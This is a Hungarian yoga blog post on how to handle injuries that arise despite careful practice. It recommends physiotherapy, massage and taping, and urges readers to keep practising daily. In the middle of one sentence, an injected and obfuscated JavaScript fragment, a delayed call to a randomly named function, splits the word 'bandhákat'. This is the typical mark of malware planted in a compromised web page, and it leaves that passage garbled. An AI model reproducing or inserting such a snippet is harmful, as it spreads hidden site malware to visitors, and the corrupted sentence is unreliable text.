Top
Mandala Jóga Online / Szerzők  / Gergő  / Megsérültem, mit csináljak?
dog_hyper_3

Megsérültem, mit csináljak?

A helytelen gyakorlásból következő sérülésekről most nem beszélnék, hiszen ezért van ott az oktató, aki személyre szabott tanácsokkal terel minden egyes tanítványt a csak rá jellemző “helyes” kivitelezés és megközelítés felé.

 

Ettől függetelnül szinte minden gyakorló életében eljön az a pillanat, amikor úgy érzi, megfelelően gyakorolt, nem erőltette túl magát, helyesen hajtotta végre a pózokat, mindvégig figyelte a légzést és a bandom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andhákat, mégis előjött valamilyen sérülés.

 

Nyugodj meg, ez teljesen normális.

 

A sérülésnek a helytelen gyakorlásból fakadó túlterhelésen kívül még számos oka lehet. Van, amikor valamilyen kisebb baleset vagy trauma utóhatásaként jön elő gyakorlás közben a fájdalom, és van, hogy ez csupán úgynevezett “fejlődési” fájdalom, ami hamar elmúlik és utána jobban működik az adott testrész, mint valaha. Testünk számos területén található kisebb-nagyobb egyensúlybomlás, amit izomfeszülés, érzékenység, a keringés pangása jelez. A gyakorlás felszabadítja, oldja ezeket a gócokat, ami átmeneti fájdalommal járhat – egy több évtizedes gócpont gyógyulása sokszor akár hónapokig elhúzódhat.

 

Mit tehetünk ilyenkor?

 

Szerencsés, ha a komolyabb gyakorló kapcsolatot tart fenn gyógytornásszal, aki járatos az izom-, szalag- és porcsérülések gyógyításában. A néhány napnál tovább húzódó fizikai problémákról érdemes vele konzultálni.

 

Meggyorsíthatja a gyógyulás folyamatát egy jó masszőr, manuálterapeuta, akupunktőr, vagy a taping. A pihenőnapokon a gyógyfürdő és az olajjal való bedörzsölés is támogatja a regenerációt.

 

És ami a legfontosabb: gyakorolj tovább! Ha szükséges, válts ki néhány ászanát, végezz könnyített gyakorlást, használj eszközöket, tégy bármit, amit jónak látsz vagy az oktatód ajánlott, de folytasd a napi szintű gyakorlást.

 

Összefoglalva: Gyakorolj minden nap. Tedd meg, amit tudsz. Ne erőltesd.

“Practice daily. Do what you can. Don’t push.”/Paul Mitchell Gold/

 

Paul Mitchell Gold angol nyelvű cikkét a témában itt olvashatod»

Németh Gergő

Meggyőződésem, hogy a jóga az egyik legjobb dolog, amit tehetünk magunkért és másokért!

No Comments

Sorry, the comment form is closed at this time.